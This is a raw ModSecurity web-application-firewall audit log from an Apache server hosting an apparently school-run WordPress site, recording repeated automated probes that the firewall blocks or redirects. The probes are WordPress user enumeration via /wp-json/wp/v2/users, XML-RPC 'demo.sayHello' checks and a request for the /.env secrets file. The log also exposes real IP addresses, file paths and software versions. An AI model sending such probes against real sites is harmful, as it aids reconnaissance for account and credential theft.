--eab1c17b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --eab1c17b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284457316444 5506 (- - -) Stopwatch2: 1746284457316444 5506; combined=4336, p1=500, p2=3594, p3=39, p4=44, p5=92, sr=131, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --eab1c17b-Z-- --29e1056e-A-- [03/May/2025:22:01:48 +0700] aBYv3IOgvPi2IO4kz1v86wAAAIU 103.236.140.4 36794 103.236.140.4 8181 --29e1056e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.223 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --29e1056e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --29e1056e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284508906945 2932 (- - -) Stopwatch2: 1746284508906945 2932; combined=1311, p1=453, p2=828, p3=0, p4=0, p5=29, sr=81, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29e1056e-Z-- --081fb218-A-- [03/May/2025:22:01:52 +0700] aBYv4IOgvPi2IO4kz1v87AAAAII 103.236.140.4 36798 103.236.140.4 8181 --081fb218-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.85.223 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.85.223 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --081fb218-C-- demo.sayHello --081fb218-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --081fb218-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284512241900 4666 (- - -) Stopwatch2: 1746284512241900 4666; combined=3731, p1=431, p2=3009, p3=22, p4=24, p5=135, sr=66, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --081fb218-Z-- --9ac86053-A-- [03/May/2025:22:08:50 +0700] aBYxgileQJs6d7wanHHPnwAAAM4 103.236.140.4 36830 103.236.140.4 8181 --9ac86053-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ac86053-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ac86053-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746284930814838 3164 (- - -) Stopwatch2: 1746284930814838 3164; combined=1314, p1=460, p2=825, p3=0, p4=0, p5=29, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ac86053-Z-- --f7cf135a-A-- [03/May/2025:22:08:53 +0700] aBYxhYOgvPi2IO4kz1v89gAAAJY 103.236.140.4 36834 103.236.140.4 8181 --f7cf135a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.202.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.202.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f7cf135a-C-- demo.sayHello --f7cf135a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f7cf135a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746284933643933 6300 (- - -) Stopwatch2: 1746284933643933 6300; combined=4490, p1=584, p2=3674, p3=31, p4=34, p5=98, sr=99, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f7cf135a-Z-- --da0b200d-A-- [03/May/2025:22:13:38 +0700] aBYyoileQJs6d7wanHHPoAAAANM 103.236.140.4 36862 103.236.140.4 8181 --da0b200d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da0b200d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da0b200d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285218934986 3342 (- - -) Stopwatch2: 1746285218934986 3342; combined=1435, p1=470, p2=934, p3=0, p4=0, p5=31, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da0b200d-Z-- --579e0b5b-A-- [03/May/2025:22:13:41 +0700] aBYypYOgvPi2IO4kz1v8_gAAAI0 103.236.140.4 36866 103.236.140.4 8181 --579e0b5b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.80.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.80.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --579e0b5b-C-- demo.sayHello --579e0b5b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --579e0b5b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285221742131 5447 (- - -) Stopwatch2: 1746285221742131 5447; combined=4039, p1=529, p2=3295, p3=29, p4=33, p5=90, sr=74, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --579e0b5b-Z-- --20a0af49-A-- [03/May/2025:22:18:34 +0700] aBYzyoOgvPi2IO4kz1v9BQAAAJY 103.236.140.4 36896 103.236.140.4 8181 --20a0af49-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --20a0af49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --20a0af49-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285514086662 3096 (- - -) Stopwatch2: 1746285514086662 3096; combined=1292, p1=433, p2=824, p3=0, p4=0, p5=35, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20a0af49-Z-- --47d83579-A-- [03/May/2025:22:18:37 +0700] aBYzzcP0ZqGY3Jj2X92X7wAAABM 103.236.140.4 36900 103.236.140.4 8181 --47d83579-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.72.34 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.72.34 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --47d83579-C-- demo.sayHello --47d83579-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --47d83579-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285517821299 5558 (- - -) Stopwatch2: 1746285517821299 5558; combined=4103, p1=501, p2=3344, p3=61, p4=32, p5=95, sr=105, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --47d83579-Z-- --d7bafc59-A-- [03/May/2025:22:20:03 +0700] aBY0I0SOhfQ6W15Bgg8K7AAAAFA 103.236.140.4 36904 103.236.140.4 8181 --d7bafc59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d7bafc59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d7bafc59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285603468506 3206 (- - -) Stopwatch2: 1746285603468506 3206; combined=1301, p1=451, p2=820, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d7bafc59-Z-- --4953351a-A-- [03/May/2025:22:20:06 +0700] aBY0JoOgvPi2IO4kz1v9CQAAAIc 103.236.140.4 36908 103.236.140.4 8181 --4953351a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4953351a-C-- demo.sayHello --4953351a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4953351a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285606657696 4809 (- - -) Stopwatch2: 1746285606657696 4809; combined=3675, p1=427, p2=3036, p3=22, p4=25, p5=95, sr=66, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4953351a-Z-- --ac82ef76-A-- [03/May/2025:22:24:58 +0700] aBY1SoOgvPi2IO4kz1v9DAAAAIg 103.236.140.4 36932 103.236.140.4 8181 --ac82ef76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ac82ef76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ac82ef76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285898237094 2906 (- - -) Stopwatch2: 1746285898237094 2906; combined=1273, p1=462, p2=780, p3=0, p4=0, p5=31, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac82ef76-Z-- --21391031-A-- [03/May/2025:22:25:02 +0700] aBY1TkSOhfQ6W15Bgg8K7gAAAFE 103.236.140.4 36936 103.236.140.4 8181 --21391031-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.84.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.84.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --21391031-C-- demo.sayHello --21391031-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --21391031-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285902456572 6869 (- - -) Stopwatch2: 1746285902456572 6869; combined=4887, p1=727, p2=3913, p3=35, p4=40, p5=102, sr=190, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --21391031-Z-- --b4421e76-A-- [03/May/2025:22:25:13 +0700] aBY1WSleQJs6d7wanHHPpAAAANQ 103.236.140.4 36942 103.236.140.4 8181 --b4421e76-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b4421e76-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b4421e76-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746285913837825 3183 (- - -) Stopwatch2: 1746285913837825 3183; combined=1409, p1=472, p2=904, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b4421e76-Z-- --3f6c036d-A-- [03/May/2025:22:25:17 +0700] aBY1XYOgvPi2IO4kz1v9DwAAAJU 103.236.140.4 36946 103.236.140.4 8181 --3f6c036d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.44.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.44.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --3f6c036d-C-- demo.sayHello --3f6c036d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f6c036d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746285917760366 5406 (- - -) Stopwatch2: 1746285917760366 5406; combined=3985, p1=512, p2=3255, p3=31, p4=32, p5=91, sr=74, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f6c036d-Z-- --de8dd058-A-- [03/May/2025:22:50:20 +0700] aBY7PIOgvPi2IO4kz1v9HAAAAJI 103.236.140.4 37242 103.236.140.4 8181 --de8dd058-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3804.0 Safari/537.36 Accept-Charset: utf-8 --de8dd058-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de8dd058-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746287420354893 810 (- - -) Stopwatch2: 1746287420354893 810; combined=329, p1=287, p2=0, p3=0, p4=0, p5=42, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de8dd058-Z-- --30a09134-A-- [03/May/2025:22:51:30 +0700] aBY7goOgvPi2IO4kz1v9HQAAAJE 103.236.140.4 37250 103.236.140.4 8181 --30a09134-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.164.229 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.164.229 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --30a09134-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --30a09134-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746287490802129 3418 (- - -) Stopwatch2: 1746287490802129 3418; combined=1443, p1=478, p2=933, p3=0, p4=0, p5=32, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
